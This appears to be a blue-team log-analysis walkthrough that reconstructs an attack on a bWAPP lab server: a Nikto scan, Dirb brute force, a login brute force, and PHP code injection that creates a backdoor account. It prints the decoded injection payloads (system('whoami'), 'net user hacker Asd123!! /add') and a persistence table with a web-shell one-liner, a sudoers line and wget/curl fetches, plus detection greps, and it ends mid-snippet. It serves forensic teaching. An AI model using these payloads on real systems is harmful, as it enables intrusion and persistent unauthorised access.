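# dirbust_check FILE UA_PATTERN: measure volume, path variety and 404 share
# for all requests whose User-Agent contains UA_PATTERN (plain substring).
# Only lines with exactly 7 quote-delimited fields are considered.
dirbust_check() {
    awk -F'"' -v ua="$2" '
        NF == 7 && index($6, ua) {
            total++
            split($2, req, " ");  paths[req[2]] = 1
            split($3, resp, " "); if (resp[1] == "404") notfound++
        }
        END {
            for (p in paths) distinct++
            pct = total ? 100 * notfound / total : 0
            printf "requests=%d distinct_paths=%d pct_404=%.1f\n", total, distinct, pct
            verdict = (total >= 1000 && pct >= 80) ? "consistent with" : "does not meet thresholds for"
            print "Result: " verdict " directory brute force"
        }
    ' "$1"
}

# Usage against the working file:
#   dirbust_check attacker_traffic.log "MSIE 6.0"
```

The verdict line covers only the two numeric conditions; review the path sample from the commands above before treating the result as confirmed.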

This log — confirmed results:

4816 total MSIE 6.0 requests
Sample paths: /bwapp/admin/2013, /bwapp/admin/2014, /bwapp/admin/21
              /bwapp/administrators  (numeric and alphabetic wordlist mix)
Response codes: Predominantly 404 — tool probing for non-existent paths
Start timestamp: [20/Jun/2021:12:37:50
End timestamp:   [20/Jun/2021:12:38:02

Q2 ANSWER: directory brute force


PHASE 4 — BUILD THE ATTACK TIMELINE

Every phase needs a timestamp boundary — this is the investigation spine


STEP 9 — Establish precise start and end timestamps for every phase

Why: Timestamps are the connective tissue of the entire investigation. Without exact phase boundaries you cannot sequence attacks correctly, calculate gaps, or determine which activity belongs to which phase. The gap between phases reveals attacker decision time — how long they paused to review results before launching the next stage.

# PHASE 1 — Nikto
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

# PHASE 2 — Dirb
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

# PHASE 3+ — Attacker's own browser (Firefox/52.0)
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

This log — confirmed timeline:

Phase 1  Nikto    Start: 12:36:24   End: 12:36:57   Duration: 33 seconds
Phase 2  Dirb     Start: 12:37:50   End: 12:38:02   Duration: ~12 seconds
[GAP]                    12:38:02 → 12:41:34        Duration: 3 min 32 sec
Phase 3+ Firefox  Start: 12:41:34   End: 12:53:23   Duration: 11 min 49 sec

Interpreting the 3 min 32 sec gap:
The attacker stopped all automated tooling after Dirb finished and went quiet for over three minutes. The most plausible reading is that the attacker was manually reviewing Dirb’s output, identifying the login page (/bWAPP/login.php), and setting up the next tool. A pause of this length after enumeration suggests a human operator making decisions between stages rather than a single script running on autopilot.
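Pauses like this one can be located automatically instead of by comparing phase boundaries by hand. The sketch below is one possible helper; find_gaps is a hypothetical name, and it assumes every entry falls on the same calendar day.

```shell
# find_gaps FILE MIN_SECONDS: print every pause of at least MIN_SECONDS
# between consecutive entries. Assumption: all entries share one calendar
# day, so only HH:MM:SS from field $4 is used (substr($4, 14) strips the
# leading "[DD/Mon/YYYY:").
find_gaps() {
    awk -v min="$2" '
        {
            split($4, t, ":")
            now = t[2] * 3600 + t[3] * 60 + t[4]
            if (NR > 1 && now - prev >= min)
                printf "%s -> %s  (%d min %d sec)\n", prev_ts, substr($4, 14), int((now - prev) / 60), (now - prev) % 60
            prev = now
            prev_ts = substr($4, 14)
        }
    ' "$1"
}

# Usage against the working file, reporting pauses of a minute or more:
#   find_gaps attacker_traffic.log 60
```

Each reported pause is a candidate phase boundary: a point where the operator may have stopped to read results before choosing the next step.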


STEP 10 — Construct the complete timeline table

Fill this in before proceeding. This table is your roadmap for all remaining analysis:

PHASE    TOOL          UA FINGERPRINT            START      END        DURATION
------   -----------   -----------------------   --------   --------   ----------
Phase 1  Nikto         Nikto/2.1.6               12:36:24   12:36:57   33 seconds
Phase 2  Dirb          MSIE 6.0 / Windows NT     12:37:50   12:38:02   ~12 seconds
         [ATTACKER ANALYSIS GAP]                 12:38:02   12:41:34   3.5 minutes
Phase 3  Unknown       Firefox/52.0 Linux        12:41:34   12:49:35   ~8 minutes
Phase 4  Unknown       Firefox/52.0 Linux        12:50:15   12:53:23   ~3 minutes

Phases 3 and 4 share the same User-Agent because they are both manual operations by the attacker using their own browser. They are distinguished by target endpoint and behavior, not by tool change.


PHASE 5 — IDENTIFY THE THIRD ATTACK TYPE

Profile Phase 3 to answer Q3


STEP 11 — Isolate Phase 3 and Phase 4 traffic into a dedicated file

Why: You need a clean, isolated view of the manual phase activity, free from Nikto and Dirb noise. All injection and brute force analysis from this point targets this file.

# Isolate all manual-phase traffic (Firefox/52.0 UA)
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log

# Confirm line count
wc -l phase3_traffic.log

# View complete Phase 3+ activity in chronological order
awk '{print $4, $6, $7, $9, $10}' phase3_traffic.log

This log — confirmed results:

174 lines in phase3_traffic.log

STEP 12 — Identify HTTP methods used in the manual phase

Why: HTTP method is the highest-signal behavioral indicator at this stage. Switching from the GET-dominant scanning of Phases 1 and 2 to heavy POST activity on a specific endpoint is a direct indicator of credential-based attack. The method ratio shapes your initial hypothesis.

# Method distribution for the entire manual phase
awk '{print $6}' phase3_traffic.log | sort | uniq -c

Interpretation framework:

Method Pattern                                Likely Attack Type
--------------------------------------------  ------------------
GET-dominant with varied endpoints            Browsing or manual recon
POST-dominant against one endpoint            Brute force or form injection
GET with long URL parameters                  Code/command injection via URL
Mixed POST heavy early, GET with params late  Brute force then post-login injection

This log — confirmed results:

 39   "GET     (browsing: page loading, asset requests, navigation)
135   "POST    (dominant — data submission to server)

135 POST requests vs 39 GET requests. The dominant action is submitting data. This rules out passive recon and points directly toward active exploitation.


STEP 13 — Map all endpoints targeted in the manual phase

Why: Endpoint concentration is the definitive differentiator between attack types. A brute force attack drills one single endpoint repeatedly. A scanner distributes requests across hundreds of different paths. The distribution shape identifies the attack type.

# All method + endpoint combinations with counts, sorted by volume
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn

Reading the distribution:

Concentration                           Attack Type
Single endpoint > 70% of traffic        Brute force: intense repetition on one target
Hundreds of paths, mostly 404           Directory/file brute force
One endpoint, varying parameters        Parameter injection
Spread across many authenticated pages  Post-login manual exploration

This log — confirmed results:

134   "POST /bWAPP/login.php       ← 77% of ALL 174 Phase 3 requests — one endpoint
  2   "GET /bWAPP/portal.php
  2   "GET /bWAPP/phpi.php?message=test
  2   "GET ...phpi.php?message=...(encoded commands)
  1   "POST /bWAPP/portal.php
  (remaining 33: single-count requests, including the other phpi.php requests, plus image/CSS/JS assets loaded when navigating the portal)

134 of 174 requests — 77% — concentrated on a single endpoint. This is the unmistakable shape of brute force.
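The concentration check can be expressed as a small calculation. This sketch assumes the counts listed above and lumps the 33 remaining requests into a hypothetical "(other)" bucket; top_endpoint_share is an illustrative helper name, and the 0.70 threshold is the one from the concentration table.

```python
def top_endpoint_share(endpoint_counts):
    """Return (endpoint, share) for the most-requested method+endpoint pair."""
    total = sum(endpoint_counts.values())
    endpoint, hits = max(endpoint_counts.items(), key=lambda item: item[1])
    return endpoint, hits / total


# Counts taken from the results above; the 33 remaining requests are
# lumped into one hypothetical "(other)" bucket for this illustration.
phase3 = {
    "POST /bWAPP/login.php": 134,
    "GET /bWAPP/portal.php": 2,
    "GET /bWAPP/phpi.php?message=test": 2,
    "GET phpi.php (encoded commands)": 2,
    "POST /bWAPP/portal.php": 1,
    "(other)": 33,
}

BRUTE_FORCE_THRESHOLD = 0.70  # from the concentration table above

endpoint, share = top_endpoint_share(phase3)
verdict = "brute-force shaped" if share > BRUTE_FORCE_THRESHOLD else "not concentrated"
print(f"{endpoint}: {share:.0%} of traffic ({verdict})")
```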


STEP 14 — Confirm the brute force pattern through response code and body size analysis

Why: The server’s HTTP responses are ground truth. For a login brute force the pattern is distinctive: a long run of identical failure responses, then a success response with a different status code and body. The body size column is the clearest evidence, because a failed login re-renders the same page and therefore returns the same byte count every time.

# Response code distribution for all login POST requests
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c

# Response CODE + BODY SIZE together — the definitive brute force fingerprint
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c

# Total login attempt count
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l

# Timing of attempts: a sustained, regular cadence points to an automated tool
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15

HTTP response reference for login pages:

Code  Body                   Meaning
200   Uniform size repeated  Failed login: same page returned every time
302   - (no body)            Successful login: server redirected to authenticated area
403   Present                IP or account blocked
429   Present                Rate limit triggered

This log — confirmed results:

132   200  4086     ← 132 failed logins: identical login-failure page (4086 bytes) every time
  2   302  -        ← 2 successful logins: redirect with no body = credentials found

Total: 134 attempts

Timing sample:
12:44:xx → 12:45:xx → 12:46:xx (regular ~4-5 second intervals, sustained for the whole run = consistent with an automated tool)

The 4086 pattern explained: The number 4086 is the byte size of the login-failure HTML page. When login fails, the server renders the same form with the same error message: same HTML, same size, every time. Seeing this size 132 times with zero variation is strong evidence that every one of those attempts received the same failed-login response.
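The status-plus-size fingerprint can be summarised in code. This is a sketch under stated assumptions: login_fingerprint is a hypothetical helper, the input is rebuilt from the counts reported above rather than read from the log, and treating 200 as failure and 302 as success is specific to how this application's login page behaves.

```python
from collections import Counter


def login_fingerprint(responses):
    """Summarise (status, body_size) pairs for POSTs to a login endpoint."""
    groups = Counter(responses)
    failures = {key: n for key, n in groups.items() if key[0] == 200}
    successes = {key: n for key, n in groups.items() if key[0] == 302}
    return {
        "attempts": sum(groups.values()),
        "failed": sum(failures.values()),
        "succeeded": sum(successes.values()),
        # One distinct (200, size) pair means every failure page was the same size.
        "uniform_failures": len(failures) == 1,
    }


# Rebuilt from the counts reported above: 132 x (200, 4086) and 2 x (302, "-").
responses = [(200, "4086")] * 132 + [(302, "-")] * 2
summary = login_fingerprint(responses)
print(summary)
```

A run of uniform failures followed by at least one success is the shape to escalate; uniform failures with no success would still be a brute force attempt, just an unsuccessful one.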

Q3 ANSWER: Brute force


PHASE 6 — CONFIRM WHETHER THE BRUTE FORCE SUCCEEDED

Answer Q4


STEP 15 — Isolate successful authentication events

Why: Whether the attack succeeded changes everything about the incident response. A failed attack requires detection tuning. A successful one requires active containment. The HTTP 302 redirect on a login endpoint is the server’s way of saying “credentials accepted, go here now.”

# Isolate ONLY the successful login redirects
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "

# Count how many successful logins occurred
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l

# Exact timestamp of first successful login
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | head -1 | awk '{print $4, $5}'

This log — confirmed results:

192.168.199.2 - - [20/Jun/2021:12:49:35 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
192.168.199.2 - - [20/Jun/2021:12:50:10 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0

2 successful logins
First breach timestamp: 12:49:35

STEP 16 — Confirm authenticated access was established (post-login navigation)

Why: A 302 on a login page is strong evidence of success, but you must also verify the attacker reached and loaded the authenticated area. If portal.php returned HTTP 200 with a full body, the attacker is definitively inside the application.

# What did the attacker load immediately after the 302 redirect?
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"

# Did the attacker reach the authenticated portal?
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"

This log — confirmed results:

12:49:35  POST /bWAPP/login.php  302  -       (success — redirect issued)
12:50:10  POST /bWAPP/login.php  302  -       (second successful login)
12:50:10  GET  /bWAPP/portal.php 200  23369   (authenticated portal loaded — 23,369 bytes)
12:50:15  POST /bWAPP/portal.php 302  23369   (navigating within authenticated area)
12:50:15  GET  /bWAPP/phpi.php   200  12735   (selected vulnerable page from portal menu)

The portal returned HTTP 200 with 23,369 bytes — a full page load, not an error or redirect. The attacker is inside.
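The same check can be written as an ordered-sequence test. In this sketch the event tuples are transcribed from the results above (with "-" body sizes recorded as 0), and authenticated_access_confirmed is an illustrative name rather than an existing tool.

```python
def authenticated_access_confirmed(events,
                                   login="/bWAPP/login.php",
                                   portal="/bWAPP/portal.php"):
    """True if a 302 on the login POST is later followed by a 200 portal page with a body."""
    seen_login_success = False
    for method, path, status, size in events:
        if method == "POST" and path == login and status == 302:
            seen_login_success = True
        elif (seen_login_success and method == "GET"
              and path == portal and status == 200 and size > 0):
            return True
    return False


# (method, path, status, body size) in log order, from the results above.
events = [
    ("POST", "/bWAPP/login.php", 302, 0),
    ("POST", "/bWAPP/login.php", 302, 0),
    ("GET", "/bWAPP/portal.php", 200, 23369),
    ("POST", "/bWAPP/portal.php", 302, 23369),
    ("GET", "/bWAPP/phpi.php", 200, 12735),
]
print(authenticated_access_confirmed(events))
```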

Q4 ANSWER: Yes


PHASE 7 — IDENTIFY THE FOURTH ATTACK

Profile post-login exploitation to answer Q5 and Q6


STEP 17 — Map all post-login activity

Why: After gaining access the attacker’s behavior changes completely. They stop repeating the same request and start navigating. What they navigate to, and what parameters they pass, reveals both the fourth attack type and the specific exploitation technique.

# Full chronological view of all activity after the successful login
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20

# All unique post-login endpoints (excluding login.php)
grep "Firefox/52.0" attacker_traffic.log | grep -v "login.php" | awk '{print $6, $7}' | sort | uniq -c | sort -rn

This log — post-login activity sequence:

12:50:10  GET  /bWAPP/portal.php                     200   (landing page after login)
12:50:15  POST /bWAPP/portal.php                     302   (selecting a vulnerability from the menu)
12:50:15  GET  /bWAPP/phpi.php                       200   (opened PHP Injection page)
12:50:17  GET  /bWAPP/phpi.php?message=test          200   (tested the parameter)
12:51:37  GET  /bWAPP/phpi.php?message=test          200   (tested again — confirming it works)
12:52:36  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 1)
12:52:46  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 2)
12:52:56  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 3)
12:53:13  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 4)
12:53:23  GET  /bWAPP/phpi.php?message=%22%22;...    200   (INJECTION PAYLOAD 4 repeated)

The attacker’s methodology visible in this sequence:
1. Land on portal, select a vulnerability category
2. Open the vulnerable page (phpi.php = PHP Injection page)
3. Test with benign input (message=test) twice to confirm the parameter is processed
4. Begin injecting OS commands once confident the parameter is vulnerable

This is systematic, professional reconnaissance-then-exploit behavior — not guessing.


STEP 18 — Identify the attack type from the endpoint and parameter pattern

Why: The endpoint name phpi.php (PHP Injection) and the way the message parameter accepts and apparently executes arbitrary content both point to one specific attack category. Confirming this requires looking at the parameter values: even URL-encoded, certain characters are recognizable as injection syntax.

# Extract all raw URL-encoded payloads sent to the injection endpoint
grep "phpi.php" attacker_traffic.log | awk '{print $7}'

# With timestamps to show execution sequence
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'

# Check what response body sizes were returned — changing sizes prove dynamic execution
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'

This log — confirmed raw payloads:

12:50:15  /bWAPP/phpi.php                                                           (no param — baseline)
12:50:17  /bWAPP/phpi.php?message=test                                              (benign test)
12:51:37  /bWAPP/phpi.php?message=test                                              (benign test repeated)
12:52:36  /bWAPP/phpi.php?message=%22%22;%20system(%27whoami%27)                    (PAYLOAD 1)
12:52:46  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%27)                (PAYLOAD 2)
12:52:56  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20share%27)               (PAYLOAD 3)
12:53:13  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)  (PAYLOAD 4)
12:53:23  /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)  (PAYLOAD 4 repeat)

Even before full decoding, the URL-encoded strings reveal:

  • %22%22 = "" — empty string used to break PHP string context
  • %3B or ; — semicolon separating PHP statements
  • system( — PHP function that executes OS shell commands
  • %27 — single quotes wrapping OS commands passed to system()

Response body sizes from the injection requests:

12:50:15  200  12735   (baseline page — no payload)
12:50:17  200  12759   (message=test — 24 bytes larger than baseline)
12:52:36  200  12778   (whoami payload — different size = dynamic output returned)
12:52:46  200  13045   (net user — much larger = command output returned in response)
12:52:56  200  13175   (net share — larger still = share list returned)
12:53:13  200  12755   (net user /add — smaller = brief success/failure message)

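The changing body sizes are strong evidence of execution. A page that merely echoed the parameter would grow by roughly the length of the input, as message=test does (+24 bytes over the baseline). The net user and net share responses grow by 310 and 440 bytes, far more than the payload text itself, which is what you would expect if the server were embedding OS command output in the response HTML.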
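The size comparison reduces to simple subtraction against the baseline. A minimal sketch using only the body sizes reported above; growth_over_baseline is a hypothetical helper name.

```python
BASELINE = 12735  # phpi.php with no message parameter

# Body sizes reported above, keyed by what was sent in the message parameter.
sizes = {
    "test": 12759,
    "whoami": 12778,
    "net user": 13045,
    "net share": 13175,
    "net user hacker Asd123!! /add": 12755,
}


def growth_over_baseline(sizes, baseline=BASELINE):
    """Bytes added to the page for each request, relative to the baseline."""
    return {label: size - baseline for label, size in sizes.items()}


deltas = growth_over_baseline(sizes)
for label, delta in deltas.items():
    print(f"{label:32} +{delta} bytes")
```

The last row deserves a second look: the /add request adds fewer bytes than message=test does, which suggests it returned little or no visible output.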

Q5 ANSWER: Code Injection
(Full technical classification: PHP Code Injection executing OS commands via system())


STEP 19 — Decode all payloads

Why: URL-encoded payloads must be fully decoded to understand what OS commands were executed on the victim system. This is non-negotiable for the incident report.

# Decode Payload 1
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27whoami%27)'))
HEREDOC

# Decode Payload 2
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%27)'))
HEREDOC

# Decode Payload 3
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20share%27)'))
HEREDOC

# Decode Payload 4 (the persistence payload)
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

Alternative — decode all payloads with full context directly from the log:

grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
    p=line.strip().split()
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"

This command outputs each payload with its timestamp, timezone, HTTP status code, and body size alongside the decoded URL — giving full investigative context in a single pass.

URL encoding reference:

Encoded   Decoded  Role in injection
%22       "        Double quote: breaks out of PHP string context
%3B or ;  ;        Semicolon: chains PHP statements
%20       (space)  Space: separates command and arguments
%27       '        Single quote: wraps OS command passed to system()
%2F       /        Forward slash: used in command flags like /add

Decoded payload table — complete:

#  Timestamp  Decoded Payload                              OS Command                     Purpose
1  12:52:36   ""; system('whoami')                         whoami                         Identify the OS user running the web server
2  12:52:46   ""; system('net user')                       net user                       List all local user accounts on the system
3  12:52:56   ""; system('net share')                      net share                      List the shared resources hosted on this machine
4  12:53:13   ""; system('net user hacker Asd123!! /add')  net user hacker Asd123!! /add  Create backdoor account
4  12:53:23   (Payload 4 repeated)                         (same)                         Confirmation execution

Injection mechanism — how ""; system('COMMAND') works:

The phpi.php page takes user input via the message parameter and evaluates it as PHP code. The attacker’s injection string exploits this directly:

""           → Empty string satisfies the PHP expression parser
;            → Ends the current PHP statement
system('X')  → Calls PHP's built-in system() function
               system() runs its argument through the OS shell and prints the command's output
               That output becomes part of the HTTP response body

This is why the response body sizes changed with each command — the server was including actual OS command output in the HTML page returned to the attacker.
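The breakdown above can be turned into a small extractor that pulls the OS command out of a raw parameter value. This is a sketch only: the regular expression assumes the single-quoted system('...') form seen in this log, and extract_os_command is an illustrative name.

```python
import re
from urllib.parse import unquote

# Matches system('COMMAND') as it appears in the decoded payloads of this log.
SYSTEM_CALL = re.compile(r"system\(\s*'([^']*)'\s*\)")


def extract_os_command(raw_value):
    """Decode a URL-encoded parameter value and return the command passed to system()."""
    decoded = unquote(raw_value)
    match = SYSTEM_CALL.search(decoded)
    return match.group(1) if match else None


payloads = [
    "test",
    "%22%22;%20system(%27whoami%27)",
    "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)",
]
for raw in payloads:
    print(repr(raw), "->", extract_os_command(raw))
```

Payloads that use other PHP execution functions or double-quoted arguments would need additional patterns.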

Q6 ANSWER: whoami
(The first payload injected was system('whoami'), which decodes from %22%22;%20system(%27whoami%27))


PHASE 8 — PERSISTENCE INVESTIGATION

Determine if the attacker planted a persistent foothold — answers Q7


STEP 20 — Understand persistence in the context of web logs

Why: Persistence means the attacker created something that survives beyond the current session — a mechanism to re-enter the system even after the web vulnerability is patched, the session expires, or the machine is rebooted. Web logs record the HTTP requests that triggered these actions. Detecting persistence from logs means identifying OS commands that create lasting artifacts.

Persistence indicators by category:

Category                        OS Command                                           What it creates
Account creation (Windows)      net user USERNAME PASS /add                          New local user account
Privilege escalation (Windows)  net localgroup administrators USERNAME /add          Adds user to admin group
Account creation (Linux)        useradd USERNAME or adduser USERNAME                 New local user account
Sudo access (Linux)             echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers   Passwordless sudo
Web shell (both)                echo "<?php system($_GET['c']); ?>" > shell.php      Backdoor script on web server
Scheduled task (Windows)        schtasks /create /tn ...                             Recurring execution
Cron job (Linux)                crontab -e or echo ... | crontab                     Recurring execution
Registry run key (Windows)      reg add HKLM\...\Run /v name /d command              Execute at every user logon
File download (both)            wget http://... -O filename or curl ... -o filename  Fetch remote payload

STEP 21 — The correct persistence search method

Why this method is required: All attack payloads in an access log are stored in their URL-encoded form. When an attacker injects net user hacker Asd123!! /add through a URL parameter, the log records it as net%20user%20hacker%20Asd123!!%20/add — with spaces encoded as %20. Searching for plaintext terms such as net user or useradd directly against the raw log will return no results because those exact strings do not exist in the file as written. Every persistence search must account for URL encoding or first decode the payloads before searching.

What this achieves: By using URL-encoded search patterns or working against decoded output, you accurately detect all persistence-related commands the attacker may have injected — including account creation, privilege escalation, scheduled tasks, web shell planting, file downloads, and registry modifications — regardless of how they were encoded in transit.

Variation A — search for URL-encoded patterns directly in the log:

# Windows account creation — net user with /add flag
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"

# Validate with the exact known pattern
grep "net%20user%20hacker" attacker_traffic.log

# Linux account creation
grep "phpi.php" attacker_traffic.log | grep -i "useradd\|adduser\|user%20add"

# Privilege escalation via group membership
grep "phpi.php" attacker_traffic.log | grep -i "localgroup\|sudoers\|sudo"

# File writing — web shell creation
grep "phpi.php" attacker_traffic.log | grep -i "echo.*php\|echo.*shell\|echo.*cmd"

# File download
grep "phpi.php" attacker_traffic.log | grep -i "wget\|curl%20\|curl+"

# Scheduled persistence
grep "phpi.php" attacker_traffic.log | grep -i "schtask\|crontab\|at%20"

# Registry persistence
grep "phpi.php" attacker_traffic.log | grep -i "reg%20add\|HKLM\|HKCU"

Variation B — decode all payloads first, then search the decoded output:

# Extract and decode all phpi.php parameters, save to a decoded file
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log

# View all decoded payloads
cat decoded_payloads.log

# Search decoded output using plaintext terms — all persistence categories
grep -i "net user.*add\|useradd\|adduser"   decoded_payloads.log
grep -i "localgroup\|administrators\|sudo"  decoded_payloads.log
grep -i "echo.*php\|shell\|webshell"        decoded_payloads.log
grep -i "wget\|curl"                        decoded_payloads.log
grep -i "schtasks\|crontab\|cron"           decoded_payloads.log
grep -i "reg add\|registry"                 decoded_payloads.log

Why Variation B is superior for complex investigations:
Searching decoded text eliminates the need to manually translate every persistence indicator into its URL-encoded form. In logs with many payloads or novel encoding, decoding first and searching second is more reliable and catches edge cases.
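A decode-first search can also be written as one classifier instead of six separate greps. The sketch below is an assumption-laden illustration: the category names and regular expressions are my own approximations of the persistence table, not an exhaustive rule set, and classify is a hypothetical helper.

```python
import re
from urllib.parse import unquote

# Illustrative patterns only; extend them for real investigations.
PERSISTENCE_PATTERNS = {
    "account_creation": re.compile(r"net\s+user\b.*\s/add\b|\buseradd\b|\badduser\b", re.I),
    "privilege_escalation": re.compile(r"\blocalgroup\b|\bsudoers\b", re.I),
    "web_shell": re.compile(r"echo\b.*<\?php", re.I),
    "file_download": re.compile(r"\b(wget|curl)\b", re.I),
    "scheduled_task": re.compile(r"\bschtasks\b|\bcrontab\b", re.I),
    "registry": re.compile(r"\breg\s+add\b|\bHK(LM|CU)\b", re.I),
}


def classify(raw_payload):
    """Decode a URL-encoded payload, then list every persistence category it matches."""
    decoded = unquote(raw_payload)
    return [name for name, pattern in PERSISTENCE_PATTERNS.items()
            if pattern.search(decoded)]


# The four payloads observed in this log, in their raw form.
observed = [
    "%22%22;%20system(%27whoami%27)",
    "%22%22;%20system(%27net%20user%27)",
    "%22%22;%20system(%27net%20share%27)",
    "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)",
]
for raw in observed:
    print(unquote(raw), "->", classify(raw) or "no persistence indicator")
```

Because matching happens after decoding, the same patterns work whether the attacker encoded a character or sent it literally.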


STEP 22 — Execute the persistence search and identify the payload

# PRIMARY SEARCH — Windows account creation via net user
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"

This log — confirmed results:

192.168.199.2 - - [20/Jun/2021:12:53:13 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

192.168.199.2 - - [20/Jun/2021:12:53:23 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

All other persistence categories return no results — confirmed absent:

Search                           Result     Conclusion
grep -i "useradd\|adduser"       No output  No Linux user creation attempted
grep -i "localgroup\|sudoers"    No output  No privilege escalation in injection phase
grep -i "echo.*php\|wget\|curl"  No output  No web shell or file download attempted
grep -i "schtask\|crontab"       No output  No scheduled task created
grep -i "reg%20add\|HKLM"        No output  No registry modification attempted

Important scoping note: Running grep "localgroup\|administrators" against the full attacker_traffic.log without the phpi.php filter returns results — but they are Nikto and Dirb scanning probes like GET /bwapp/administrators/ 404 and GET /bwapp/_vti_pvt/administrators.pwd 404. These are reconnaissance requests, not injected commands. Always scope persistence searches to the injection endpoint (phpi.php) to prevent false positives from earlier scanning phases.


STEP 23 — Extract and document the persistence payload precisely

Why: The incident report and containment response require the exact payload in the exact format it appeared in the log. The HTTP response also matters: a 200 confirms the server processed the request carrying the payload, which makes it likely the command ran, but the web log alone cannot confirm that the backdoor account was actually created on the victim system.

# Confirm the payload and its HTTP response
grep "net%20user%20hacker" attacker_traffic.log

# Verify the server returned HTTP 200 (payload was processed)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'

# Decode the persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC

This log — confirmed results:

Response codes:  200  12755    (both executions)
                 200  12755    (identical body sizes)

Decoded payload: ""; system('net user hacker Asd123!! /add')

Why both executions returned body size 12755:
Identical sizes mean the server returned the same content both times, so the command produced the same visible output on each run. The access log does not show what that output was, and it does not record the command's exit status. A second /add for an account that already exists would normally fail, so identical responses do not by themselves prove the account was created. Verify on the host (for example with net user hacker, or by checking the Windows Security log for event ID 4720, "A user account was created") and treat the account as present until that check says otherwise.

Why it was executed twice:
When injecting commands through a web application without direct terminal access, the attacker cannot see stderr or reliably confirm execution status. Repeating the same persistence command 10 seconds later is most plausibly an attempt to make sure it ran.

Operational impact:
net user hacker Asd123!! /add creates a local Windows user account named hacker with password Asd123!!. This account:

  • Persists across reboots
  • Persists after the web application vulnerability is patched
  • Can be used for direct login via RDP (port 3389), SMB (port 445), or any service accepting local Windows credentials
  • Provides re-entry to the victim machine independent of the web application

STEP 24 — Record the persistence payload in both formats

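Why: The forensically precise representation of the payload is the raw URL-encoded inner command exactly as it appears in the log, because that is what was transmitted over the network and what constitutes the evidence in the log file. The second format is the decoded form from Step 23, ""; system('net user hacker Asd123!! /add'), which is the readable version for the report narrative.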

Raw URL-encoded persistence payload (as it appears in the log):

%27net%20user%20hacker%20Asd123!!%20/add%27

Breaking down this exact string:

%27         → '   (opening single quote)
net         → net  (literal — not encoded)
%20         → (space)
user        → user  (literal)
%20         → (space)
hacker      → hacker  (literal)
%20         → (space)
Asd123!!    → Asd123!!  (literal — the !! is NOT URL-encoded in the log)
%20         → (space)
/add        → /add  (literal — the / is NOT URL-encoded in the log)
%27         → '   (closing single quote)

Complete URL parameter as it appears in the log:

/bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)
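One practical reason to record the raw string verbatim is that re-encoding the decoded command does not necessarily reproduce it. The sketch below uses Python's urllib.parse to illustrate this; the choice of safe characters is my assumption, made to mirror the fact that ! and / appear unencoded in this log.

```python
from urllib.parse import quote, unquote

raw = "%27net%20user%20hacker%20Asd123!!%20/add%27"  # exactly as logged

decoded = unquote(raw)
print(decoded)

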